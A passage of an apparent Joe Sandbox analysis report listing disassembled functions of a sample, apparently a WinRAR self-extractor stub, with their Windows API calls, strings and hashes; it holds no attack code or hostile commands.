                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 477a5d770f235ecff57e66318da10c36426abf96b432f04db456c993f3e1b66d
                                              • Instruction ID: a0ffbe27611168666d2c48e816c8b01741c73009cda0dabdc653809451a388a5
                                              • Opcode Fuzzy Hash: 477a5d770f235ecff57e66318da10c36426abf96b432f04db456c993f3e1b66d
                                              • Instruction Fuzzy Hash: CA11667951428CEFCF01EF54C942DDD3BA5EF04350B6540A9FA085B272D671DA51EB50
                                              Function 00CB9AB1 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                              • String ID: csm$csm$csm
                                              • API String ID: 322700389-393685449
                                              • Opcode ID: a685dcf7a0266ffdd55f4e08fa872bbbb31f7e5be9b0f5806890bbf91669bab5
                                              • Instruction ID: 8ffde2b80afd9e4eef632940749cc752adbff8d904710cfff91b74802325f84f
                                              • Opcode Fuzzy Hash: a685dcf7a0266ffdd55f4e08fa872bbbb31f7e5be9b0f5806890bbf91669bab5
                                              • Instruction Fuzzy Hash: F3B18835800209EFCF29DFA5D9819EEBBB5FF04310F14455AEA256B212D730EE51DBA1
                                              Function 00C9D990 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 268fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9D99A
                                              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00C9D9BF
                                              • GetLongPathNameW.KERNEL32(?,?,?), ref: 00C9DA11
                                              • GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 00C9DA34
                                              • GetShortPathNameW.KERNEL32(?,?,?), ref: 00C9DA84
                                              • MoveFileW.KERNEL32(-00000040,-00000028), ref: 00C9DC9F
                                              • MoveFileW.KERNEL32(-00000028,-00000040), ref: 00C9DCEC
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: NamePath$FileLongMoveShort$H_prolog3__wcslen
                                              • String ID: rtmp
                                              • API String ID: 2388273531-870060881
                                              • Opcode ID: 27d310d05b3b4f89cf52b1592a0c227ac3f5e7d612047f1f385235fcb85ce725
                                              • Instruction ID: d61306f87c5f5db57a87f8f56160c9b7fb05f8208b425b6c5190c0a2c35c592b
                                              • Opcode Fuzzy Hash: 27d310d05b3b4f89cf52b1592a0c227ac3f5e7d612047f1f385235fcb85ce725
                                              • Instruction Fuzzy Hash: 1EB10371901259DACF20EFA4CC89BDDBBB9AF19305F444099E40AB7251DB349F89EF60
                                              Function 00CA1E54 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 215COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3__wcslen
                                              • String ID: .rar$exe$rar$sfx
                                              • API String ID: 3251556500-630704357
                                              • Opcode ID: 26d81d4eb804b3aaf442e05caa0d1825ed76da0291e9a31ecdccfe750525c4d3
                                              • Instruction ID: 42bbcc169fd76570f8a1bdbcf144885d90199d195dc0b16471634fb31a332fa8
                                              • Opcode Fuzzy Hash: 26d81d4eb804b3aaf442e05caa0d1825ed76da0291e9a31ecdccfe750525c4d3
                                              • Instruction Fuzzy Hash: 7F71F530A007169FCF21DFA8C985AADB7F4EF4A718F28051DF891AB291DB719A42D750
                                              Function 00CB53D0 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00CA04AB,00CA04AD,00000000,00000000,9CAA5719,00000001,00000000,00000000,?,00CA038C,?,00000004,00CA04AB,ROOT\CIMV2), ref: 00CB5459
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00CA04AB,?,00000000,00000000,?,?,00CA038C,?,00000004,00CA04AB), ref: 00CB54D4
                                              • SysAllocString.OLEAUT32(00000000), ref: 00CB54DF
                                              • _com_issue_error.COMSUPP ref: 00CB5508
                                              • _com_issue_error.COMSUPP ref: 00CB5512
                                              • GetLastError.KERNEL32(80070057,9CAA5719,00000001,00000000,00000000,?,00CA038C,?,00000004,00CA04AB,ROOT\CIMV2), ref: 00CB5517
                                              • _com_issue_error.COMSUPP ref: 00CB552A
                                              • GetLastError.KERNEL32(00000000,?,00CA038C,?,00000004,00CA04AB,ROOT\CIMV2), ref: 00CB5540
                                              • _com_issue_error.COMSUPP ref: 00CB5553
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                              • String ID:
                                              • API String ID: 1353541977-0
                                              • Opcode ID: 178500d3f2cac91fd559805b4dfe62304cfdd4776cb46042da952ae0bb7d7a8a
                                              • Instruction ID: 79d05eacfcf01df71a2a1ab2035e263b00676627426aadfda2974b7e1c8ad16e
                                              • Opcode Fuzzy Hash: 178500d3f2cac91fd559805b4dfe62304cfdd4776cb46042da952ae0bb7d7a8a
                                              • Instruction Fuzzy Hash: FD4116B1A00604ABCB109FA9DC85BEEBBF9EF48711F104229F519E7290DB359940CBA4
                                              Function 00CA0469 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 197COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00CA0470
                                                • Part of subcall function 00CA0360: __EH_prolog3.LIBCMT ref: 00CA0367
                                              • VariantClear.OLEAUT32(?), ref: 00CA05FA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3$ClearVariant
                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                              • API String ID: 4196654922-3505469590
                                              • Opcode ID: fcfb1123ead261631aaf9d9f24f4ca80667a5c40fe0155502c5c2c74bdceff07
                                              • Instruction ID: c35b13cbbfe61ad074365b3fb693c2c1d0ab620f873f36350849f58c030b957c
                                              • Opcode Fuzzy Hash: fcfb1123ead261631aaf9d9f24f4ca80667a5c40fe0155502c5c2c74bdceff07
                                              • Instruction Fuzzy Hash: 70612A71A0021AAFDB14DFA4CC95EBEB7B9FF49758B14055CF516A72A0CB30AD02DB60
                                              Function 00CAE07E Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 174COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: H_prolog3_wcslen
                                              • String ID: $</p>$</style>$<br>$<style>
                                              • API String ID: 3746244732-3393513139
                                              • Opcode ID: ea258498778eaa113cee1b85a3340b32f88fef7ed3ce16a97aba019cc9be62a9
                                              • Instruction ID: 2e17561e97cbb2295e965ed28de2f2226ac4b8969091c038f474f1a6f30b2469
                                              • Opcode Fuzzy Hash: ea258498778eaa113cee1b85a3340b32f88fef7ed3ce16a97aba019cc9be62a9
                                              • Instruction Fuzzy Hash: 38514875B0022397DB349A2588517BE73B1AF6234DF580019FA92AB2C2EB758F8193D0
                                              Function 00CB06D0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00C91E44: GetDlgItem.USER32(00000000,00003021), ref: 00C91E88
                                                • Part of subcall function 00C91E44: SetWindowTextW.USER32(00000000,00CCC6C8), ref: 00C91E9E
                                              • EndDialog.USER32(?,00000001), ref: 00CB0720
                                              • SendMessageW.USER32(?,00000080,00000001,00040449), ref: 00CB0747
                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,01050E65), ref: 00CB0760
                                              • GetDlgItem.USER32(?,00000065), ref: 00CB077C
                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00CB0790
                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00CB07A6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: MessageSend$Item$DialogTextWindow
                                              • String ID: LICENSEDLG
                                              • API String ID: 3077722735-2177901306
                                              • Opcode ID: 89263962b4e3cc99d24258aeade78c82a22cec6636829c8202f6806de3762ee5
                                              • Instruction ID: c0dea11be183b11336fedaebe098e7865c42429366ae3d5410aacecc5404aeea
                                              • Opcode Fuzzy Hash: 89263962b4e3cc99d24258aeade78c82a22cec6636829c8202f6806de3762ee5
                                              • Instruction Fuzzy Hash: BD212531249244BBE2116F21DD8DFEF7BACEB47785F100214F601BA091CF61AA02DB71
                                              Function 00CA7818 Relevance: 12.1, APIs: 8, Instructions: 131timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __aulldiv.LIBCMT ref: 00CA783D
                                                • Part of subcall function 00CA067E: GetVersionExW.KERNEL32(?), ref: 00CA06AF
                                              • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00CA7860
                                              • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00CA7872
                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CA7883
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA7893
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA78A3
                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00CA78DE
                                              • __aullrem.LIBCMT ref: 00CA7984
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                              • String ID:
                                              • API String ID: 1247370737-0
                                              • Opcode ID: d30595ca803ea9f8314ddc860ac5ea49972acd6d95dbd31406f6ddff60500d01
                                              • Instruction ID: b90f79a32dd4fd9cc1a40ce212fd96a425b98f8f247a6b0fecb0328905d91df7
                                              • Opcode Fuzzy Hash: d30595ca803ea9f8314ddc860ac5ea49972acd6d95dbd31406f6ddff60500d01
                                              • Instruction Fuzzy Hash: 365128B15083069FD710DF65C884AAFF7E9FB88714F008A2EF59AD2210E738E549DB52
                                              Function 00CA0E49 Relevance: 10.7, APIs: 7, Instructions: 197COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CA0E50
                                              • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,00000030), ref: 00CA0E85
                                              • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00CA0EC4
                                              • _wcslen.LIBCMT ref: 00CA0ED4
                                              • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000030), ref: 00CA0F51
                                              • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00CA0F93
                                              • _wcslen.LIBCMT ref: 00CA0FA3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: FullNamePath$_wcslen$H_prolog3_
                                              • String ID:
                                              • API String ID: 840513527-0
                                              • Opcode ID: 638ea8d9dfd08defeb227da51d1f0bfde2d80cfdb7656d8eea62d73023e01976
                                              • Instruction ID: 297b7e9a2c5269148bfba8244f4153a4995004c10df78718a96d59895227f32a
                                              • Opcode Fuzzy Hash: 638ea8d9dfd08defeb227da51d1f0bfde2d80cfdb7656d8eea62d73023e01976
                                              • Instruction Fuzzy Hash: 10618F71D0024AAFCF14DFA9D985EEEBBB9AF86714F284119F810F7241DB749940DB60
                                              Function 00CC6239 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00CC69AE,?,00000000,?,00000000,00000000), ref: 00CC627B
                                              • __fassign.LIBCMT ref: 00CC62F6
                                              • __fassign.LIBCMT ref: 00CC6311
                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00CC6337
                                              • WriteFile.KERNEL32(?,?,00000000,00CC69AE,00000000,?,?,?,?,?,?,?,?,?,00CC69AE,?), ref: 00CC6356
                                              • WriteFile.KERNEL32(?,?,00000001,00CC69AE,00000000,?,?,?,?,?,?,?,?,?,00CC69AE,?), ref: 00CC638F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                              • String ID:
                                              • API String ID: 1324828854-0
                                              • Opcode ID: dd3c1e01069231e3556080ec123a04bb4a714f9c80cd33121a65863a14797ba9
                                              • Instruction ID: 6b77708c01cd495bfff10380c01a84fe6d3d1ef767ad285576c510cb493ad49d
                                              • Opcode Fuzzy Hash: dd3c1e01069231e3556080ec123a04bb4a714f9c80cd33121a65863a14797ba9
                                              • Instruction Fuzzy Hash: 6C51C174A102899FDB10CFA8D985FEEBBF8EF09310F18415EE956E72A1D7709941CB60
                                              Function 00CB93C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                              Download Yara Rule
                                              APIs
                                              • _ValidateLocalCookies.LIBCMT ref: 00CB93F7
                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00CB93FF
                                              • _ValidateLocalCookies.LIBCMT ref: 00CB9488
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00CB94B3
                                              • _ValidateLocalCookies.LIBCMT ref: 00CB9508
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                              • String ID: csm
                                              • API String ID: 1170836740-1018135373
                                              • Opcode ID: 48b1c6ed007f75dbf642c56891408dbe2787555565239021b58aefb0884ebc8c
                                              • Instruction ID: be24cbbe1ed58017476ed4884799aff8ddc2131a370632947c72027f40c4eb92
                                              • Opcode Fuzzy Hash: 48b1c6ed007f75dbf642c56891408dbe2787555565239021b58aefb0884ebc8c
                                              • Instruction Fuzzy Hash: 82419234A00218AFCF10DF68C885ADEBBB5EF45314F148555E929AB3A2D731EE06CF91
                                              Function 00CAE265 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CAE26C
                                              • ShowWindow.USER32(?,00000000,00000038), ref: 00CAE294
                                              • GetWindowRect.USER32(?,?), ref: 00CAE2D8
                                              • ShowWindow.USER32(?,00000005,?,00000000), ref: 00CAE373
                                              • ShowWindow.USER32(00000000,00000005), ref: 00CAE394
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Window$Show$H_prolog3_Rect
                                              • String ID: RarHtmlClassName
                                              • API String ID: 950582801-1658105358
                                              • Opcode ID: 422d2820b32edecfdc1ea593a5409ae8988b230d15c9ae189571f4debdc36dc9
                                              • Instruction ID: c85eeec99c039d65e8cae5b587b1c8dbd121dca70a64628ff05fb14c06c4b272
                                              • Opcode Fuzzy Hash: 422d2820b32edecfdc1ea593a5409ae8988b230d15c9ae189571f4debdc36dc9
                                              • Instruction Fuzzy Hash: 83418A71901209EFDF119FA4DC89BEE7BB8EF49304F044259F919AB1A5DB309A41DBA0
                                              Function 00CC3554 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00CC3518: _free.LIBCMT ref: 00CC3541
                                              • _free.LIBCMT ref: 00CC35A2
                                                • Part of subcall function 00CC03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?), ref: 00CC03EA
                                                • Part of subcall function 00CC03D4: GetLastError.KERNEL32(?,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?,?), ref: 00CC03FC
                                              • _free.LIBCMT ref: 00CC35AD
                                              • _free.LIBCMT ref: 00CC35B8
                                              • _free.LIBCMT ref: 00CC360C
                                              • _free.LIBCMT ref: 00CC3617
                                              • _free.LIBCMT ref: 00CC3622
                                              • _free.LIBCMT ref: 00CC362D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                              • Instruction ID: 566f6b1a25977ee3f3a756cca87a76524d0547e30787ea139f54a829ab9e75e2
                                              • Opcode Fuzzy Hash: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
                                              • Instruction Fuzzy Hash: 4F11C971550B84FBD630BBB0DC46FCB779CAF04700F44881DF299A6162DA75A605A790
                                              Function 00CB4D5F Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00CB4DDA,00CB4D3D,00CB4FDE), ref: 00CB4D76
                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CB4D8C
                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CB4DA1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AddressProc$HandleModule
                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                              • API String ID: 667068680-1718035505
                                              • Opcode ID: f5d094d0b0348891d81adbc39ed32759e4584b0deb56cd16bf9705d049629913
                                              • Instruction ID: c1b675c8003abe2a76c8eb3e6191de8b7bff6819d494014a6c04bfa675b8281e
                                              • Opcode Fuzzy Hash: f5d094d0b0348891d81adbc39ed32759e4584b0deb56cd16bf9705d049629913
                                              • Instruction Fuzzy Hash: EEF02B31709B72AF0F2A5FB5DDC4BFE23DCAA06719B14053DD621D7282E620CE118791
                                              Function 00CC1609 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CBC5A2,00CBC5A2,?,?,?,00CC185A,00000001,00000001,C5E85006), ref: 00CC1663
                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CC185A,00000001,00000001,C5E85006,?,?,?), ref: 00CC16E9
